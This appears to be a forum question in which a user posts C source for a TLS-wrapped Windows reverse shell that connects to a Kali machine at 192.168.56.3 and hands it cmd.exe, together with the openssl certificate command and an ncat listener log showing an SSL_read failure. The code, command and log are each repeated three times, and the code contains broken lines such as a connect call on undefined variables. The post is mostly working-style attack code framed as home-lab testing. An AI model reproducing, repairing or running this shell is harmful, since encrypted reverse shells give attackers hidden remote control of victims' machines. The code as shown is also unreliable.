I make a reverse shell for testing purposes and have encrypted with SSL it below:
<code>/*
x86_64-w64-mingw32-g++ ssl.c -o ssl.exe -I/opt/openssl/include/ -L/opt/openssl/lib64/ -lssl -lcrypto -lws2_32 -lcrypt32 -s -Os
*/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <ws2def.h>
// openssl headers
#include <openssl/ssl.h>
#include <openssl/err.h>
// SSL functions
static SSL_CTX* create_context(){
const SSL_METHOD *method;
SSL_CTX *ctx;
method = TLS_client_method();
ctx = SSL_CTX_new(method);
if(ctx == NULL){
printf("[!] Unable to create SSL contextn");
ERR_print_errors_fp(stderr);
exit(0);
}
return ctx;
}
static void configure_client_context(SSL_CTX *ctx){
SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER, NULL);
// loading self signed certificate
if (!SSL_CTX_load_verify_locations(ctx, "./cert.pem", NULL)) {
printf("[!] Unable to verify location of cert.pemn");
ERR_print_errors_fp(stderr);
exit(0);
}
}
int main()
{
// SSL variables
SSL_CTX *ssl_ctx = NULL;
SSL *ssl;
ssl_ctx = create_context();
configure_client_context(ssl_ctx); // Added configuration for client context
char placetogo[32] = "192.168.56.3" ;
int prt = 5000;
TCHAR cmd[160] = TEXT("cmd.exe");
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);
SOCKET newConn = WSASocketW( 2, 1, 6, NULL, (unsigned int)NULL, (unsigned int)NULL);
STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;
struct sockaddr_in infsok;
infsok.sin_port = htons(prt) ;
int sz = sizeof(infsok);
infsok.sin_family = 2;
struct hostent *host;
char placetogo2[8] ;
host = gethostbyname(placetogo);
strcpy_s(placetogo, 16, inet_ntoa(*((struct in_addr *)host->h_addr)));
infsok.sin_addr.s_addr = inet_addr(placetogo);
memset(&ini_processo, 0, sizeof(ini_processo));
const sockaddr *name = (SOCKADDR*)&infsok;
ini_processo.cb = sizeof(ini_processo);
ini_processo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)newConn;
connect(x, name, w);
// create SSL structure
ssl = SSL_new(ssl_ctx);
if(!SSL_set_fd(ssl, newConn)){
printf("[!] Unable to create client SSL structre...n");
ERR_print_errors_fp(stderr);
exit(0);
}
SSL_set_tlsext_host_name(ssl, placetogo); // set hostname
if(!SSL_set1_host(ssl, placetogo)){ // checking hostname
printf("[!] Hostname check failed...n");
ERR_print_errors_fp(stderr);
exit(0);
}
if (SSL_connect(ssl) == 1){
printf("[*] Successful SSL connection innitiatedn");
CreateProcessW(NULL, (LPWSTR)cmd, NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOW) &ini_processo, &processo_info);
}
else{
printf("[!] SSL connection failed...n");
printf("[*] Last WSA error: %i", WSAGetLastError());
ERR_print_errors_fp(stderr);
if(ssl != NULL){
SSL_shutdown(ssl);
SSL_free(ssl);
}
SSL_CTX_free(ssl_ctx);
}
return 0;
}
</code>
<code>/*
x86_64-w64-mingw32-g++ ssl.c -o ssl.exe -I/opt/openssl/include/ -L/opt/openssl/lib64/ -lssl -lcrypto -lws2_32 -lcrypt32 -s -Os
*/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <ws2def.h>
// openssl headers
#include <openssl/ssl.h>
#include <openssl/err.h>
// SSL functions
static SSL_CTX* create_context(){
const SSL_METHOD *method;
SSL_CTX *ctx;
method = TLS_client_method();
ctx = SSL_CTX_new(method);
if(ctx == NULL){
printf("[!] Unable to create SSL contextn");
ERR_print_errors_fp(stderr);
exit(0);
}
return ctx;
}
static void configure_client_context(SSL_CTX *ctx){
SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER, NULL);
// loading self signed certificate
if (!SSL_CTX_load_verify_locations(ctx, "./cert.pem", NULL)) {
printf("[!] Unable to verify location of cert.pemn");
ERR_print_errors_fp(stderr);
exit(0);
}
}
int main()
{
// SSL variables
SSL_CTX *ssl_ctx = NULL;
SSL *ssl;
ssl_ctx = create_context();
configure_client_context(ssl_ctx); // Added configuration for client context
char placetogo[32] = "192.168.56.3" ;
int prt = 5000;
TCHAR cmd[160] = TEXT("cmd.exe");
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);
SOCKET newConn = WSASocketW( 2, 1, 6, NULL, (unsigned int)NULL, (unsigned int)NULL);
STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;
struct sockaddr_in infsok;
infsok.sin_port = htons(prt) ;
int sz = sizeof(infsok);
infsok.sin_family = 2;
struct hostent *host;
char placetogo2[8] ;
host = gethostbyname(placetogo);
strcpy_s(placetogo, 16, inet_ntoa(*((struct in_addr *)host->h_addr)));
infsok.sin_addr.s_addr = inet_addr(placetogo);
memset(&ini_processo, 0, sizeof(ini_processo));
const sockaddr *name = (SOCKADDR*)&infsok;
ini_processo.cb = sizeof(ini_processo);
ini_processo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)newConn;
connect(x, name, w);
// create SSL structure
ssl = SSL_new(ssl_ctx);
if(!SSL_set_fd(ssl, newConn)){
printf("[!] Unable to create client SSL structre...n");
ERR_print_errors_fp(stderr);
exit(0);
}
SSL_set_tlsext_host_name(ssl, placetogo); // set hostname
if(!SSL_set1_host(ssl, placetogo)){ // checking hostname
printf("[!] Hostname check failed...n");
ERR_print_errors_fp(stderr);
exit(0);
}
if (SSL_connect(ssl) == 1){
printf("[*] Successful SSL connection innitiatedn");
CreateProcessW(NULL, (LPWSTR)cmd, NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOW) &ini_processo, &processo_info);
}
else{
printf("[!] SSL connection failed...n");
printf("[*] Last WSA error: %i", WSAGetLastError());
ERR_print_errors_fp(stderr);
if(ssl != NULL){
SSL_shutdown(ssl);
SSL_free(ssl);
}
SSL_CTX_free(ssl_ctx);
}
return 0;
}
</code>
/*
x86_64-w64-mingw32-g++ ssl.c -o ssl.exe -I/opt/openssl/include/ -L/opt/openssl/lib64/ -lssl -lcrypto -lws2_32 -lcrypt32 -s -Os
*/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <ws2def.h>
// openssl headers
#include <openssl/ssl.h>
#include <openssl/err.h>
// SSL functions
static SSL_CTX* create_context(){
const SSL_METHOD *method;
SSL_CTX *ctx;
method = TLS_client_method();
ctx = SSL_CTX_new(method);
if(ctx == NULL){
printf("[!] Unable to create SSL contextn");
ERR_print_errors_fp(stderr);
exit(0);
}
return ctx;
}
static void configure_client_context(SSL_CTX *ctx){
SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER, NULL);
// loading self signed certificate
if (!SSL_CTX_load_verify_locations(ctx, "./cert.pem", NULL)) {
printf("[!] Unable to verify location of cert.pemn");
ERR_print_errors_fp(stderr);
exit(0);
}
}
int main()
{
// SSL variables
SSL_CTX *ssl_ctx = NULL;
SSL *ssl;
ssl_ctx = create_context();
configure_client_context(ssl_ctx); // Added configuration for client context
char placetogo[32] = "192.168.56.3" ;
int prt = 5000;
TCHAR cmd[160] = TEXT("cmd.exe");
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);
SOCKET newConn = WSASocketW( 2, 1, 6, NULL, (unsigned int)NULL, (unsigned int)NULL);
STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;
struct sockaddr_in infsok;
infsok.sin_port = htons(prt) ;
int sz = sizeof(infsok);
infsok.sin_family = 2;
struct hostent *host;
char placetogo2[8] ;
host = gethostbyname(placetogo);
strcpy_s(placetogo, 16, inet_ntoa(*((struct in_addr *)host->h_addr)));
infsok.sin_addr.s_addr = inet_addr(placetogo);
memset(&ini_processo, 0, sizeof(ini_processo));
const sockaddr *name = (SOCKADDR*)&infsok;
ini_processo.cb = sizeof(ini_processo);
ini_processo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)newConn;
connect(x, name, w);
// create SSL structure
ssl = SSL_new(ssl_ctx);
if(!SSL_set_fd(ssl, newConn)){
printf("[!] Unable to create client SSL structre...n");
ERR_print_errors_fp(stderr);
exit(0);
}
SSL_set_tlsext_host_name(ssl, placetogo); // set hostname
if(!SSL_set1_host(ssl, placetogo)){ // checking hostname
printf("[!] Hostname check failed...n");
ERR_print_errors_fp(stderr);
exit(0);
}
if (SSL_connect(ssl) == 1){
printf("[*] Successful SSL connection innitiatedn");
CreateProcessW(NULL, (LPWSTR)cmd, NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOW) &ini_processo, &processo_info);
}
else{
printf("[!] SSL connection failed...n");
printf("[*] Last WSA error: %i", WSAGetLastError());
ERR_print_errors_fp(stderr);
if(ssl != NULL){
SSL_shutdown(ssl);
SSL_free(ssl);
}
SSL_CTX_free(ssl_ctx);
}
return 0;
}
The IP, 192.168.56.3 is my kali linux machine and the cert.pem is generated as follows:
<code>openssl req -new -x509 -keyout key.pem -out cert.pem -days 365 -subj "/C=US/ST=State/L=City/O=Organization/OU=Unit/CN=localhost" -addext "subjectAltName=DNS:localhost,IP:192.168.56.3"
</code>
<code>openssl req -new -x509 -keyout key.pem -out cert.pem -days 365 -subj "/C=US/ST=State/L=City/O=Organization/OU=Unit/CN=localhost" -addext "subjectAltName=DNS:localhost,IP:192.168.56.3"
</code>
openssl req -new -x509 -keyout key.pem -out cert.pem -days 365 -subj "/C=US/ST=State/L=City/O=Organization/OU=Unit/CN=localhost" -addext "subjectAltName=DNS:localhost,IP:192.168.56.3"
The reverse shell is ran in my windows 11 VM, and when I start my ncat listener on my kali machine and get this SSL_read error (after I execute my shell) that I can’t find any specifics about:
<code>ncat -vnl 5000 --ssl --ssl-key key.pem --ssl-cert cert.pem -v -v -v
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Enter PEM pass phrase:
NCAT DEBUG: Initialized fdlist with 103 maxfds
Ncat: Listening on [::]:5000
NCAT DEBUG: Added fd 3 to list, nfds 1, maxfd 3
Ncat: Listening on 0.0.0.0:5000
NCAT DEBUG: Added fd 4 to list, nfds 2, maxfd 4
NCAT DEBUG: Added fd 0 to list, nfds 3, maxfd 4
NCAT DEBUG: Initialized fdlist with 100 maxfds
NCAT DEBUG: selecting, fdmax 4
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 4 is ready
NCAT DEBUG: Swapping fd[0] (3) with fd[2] (0)
NCAT DEBUG: Removed fd 3 from list, nfds 2, maxfd 4
NCAT DEBUG: Swapping fd[1] (4) with fd[1] (4)
NCAT DEBUG: Removed fd 4 from list, nfds 1, maxfd 0
Ncat: Connection from 192.168.56.9:49682.
NCAT DEBUG: Added fd 5 to list, nfds 2, maxfd 5
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: Added fd 5 to list, nfds 1, maxfd 5
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: SSL_read error on 5: error:00000001:lib(0)::reason(1)
NCAT DEBUG: Closing connection.
NCAT DEBUG: Swapping fd[1] (5) with fd[1] (5)
NCAT DEBUG: Removed fd 5 from list, nfds 1, maxfd 0
NCAT DEBUG: Swapping fd[0] (5) with fd[0] (5)
NCAT DEBUG: Removed fd 5 from list, nfds 0, maxfd 0
</code>
<code>ncat -vnl 5000 --ssl --ssl-key key.pem --ssl-cert cert.pem -v -v -v
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Enter PEM pass phrase:
NCAT DEBUG: Initialized fdlist with 103 maxfds
Ncat: Listening on [::]:5000
NCAT DEBUG: Added fd 3 to list, nfds 1, maxfd 3
Ncat: Listening on 0.0.0.0:5000
NCAT DEBUG: Added fd 4 to list, nfds 2, maxfd 4
NCAT DEBUG: Added fd 0 to list, nfds 3, maxfd 4
NCAT DEBUG: Initialized fdlist with 100 maxfds
NCAT DEBUG: selecting, fdmax 4
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 4 is ready
NCAT DEBUG: Swapping fd[0] (3) with fd[2] (0)
NCAT DEBUG: Removed fd 3 from list, nfds 2, maxfd 4
NCAT DEBUG: Swapping fd[1] (4) with fd[1] (4)
NCAT DEBUG: Removed fd 4 from list, nfds 1, maxfd 0
Ncat: Connection from 192.168.56.9:49682.
NCAT DEBUG: Added fd 5 to list, nfds 2, maxfd 5
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: Added fd 5 to list, nfds 1, maxfd 5
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: SSL_read error on 5: error:00000001:lib(0)::reason(1)
NCAT DEBUG: Closing connection.
NCAT DEBUG: Swapping fd[1] (5) with fd[1] (5)
NCAT DEBUG: Removed fd 5 from list, nfds 1, maxfd 0
NCAT DEBUG: Swapping fd[0] (5) with fd[0] (5)
NCAT DEBUG: Removed fd 5 from list, nfds 0, maxfd 0
</code>
ncat -vnl 5000 --ssl --ssl-key key.pem --ssl-cert cert.pem -v -v -v
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Enter PEM pass phrase:
NCAT DEBUG: Initialized fdlist with 103 maxfds
Ncat: Listening on [::]:5000
NCAT DEBUG: Added fd 3 to list, nfds 1, maxfd 3
Ncat: Listening on 0.0.0.0:5000
NCAT DEBUG: Added fd 4 to list, nfds 2, maxfd 4
NCAT DEBUG: Added fd 0 to list, nfds 3, maxfd 4
NCAT DEBUG: Initialized fdlist with 100 maxfds
NCAT DEBUG: selecting, fdmax 4
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 4 is ready
NCAT DEBUG: Swapping fd[0] (3) with fd[2] (0)
NCAT DEBUG: Removed fd 3 from list, nfds 2, maxfd 4
NCAT DEBUG: Swapping fd[1] (4) with fd[1] (4)
NCAT DEBUG: Removed fd 4 from list, nfds 1, maxfd 0
Ncat: Connection from 192.168.56.9:49682.
NCAT DEBUG: Added fd 5 to list, nfds 2, maxfd 5
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: Added fd 5 to list, nfds 1, maxfd 5
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: SSL_read error on 5: error:00000001:lib(0)::reason(1)
NCAT DEBUG: Closing connection.
NCAT DEBUG: Swapping fd[1] (5) with fd[1] (5)
NCAT DEBUG: Removed fd 5 from list, nfds 1, maxfd 0
NCAT DEBUG: Swapping fd[0] (5) with fd[0] (5)
NCAT DEBUG: Removed fd 5 from list, nfds 0, maxfd 0
I’ve also tried socat to no avail. Does anyone know what I can do to debug this more effectively? Or is it a certificate issue? I’ve also disabled windows firewall to make sure it wasn’t something there. I created a shared directory between my kali machine and the VM so they are using the same certificate and being executed in the same place.
New contributor
vsz29087 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.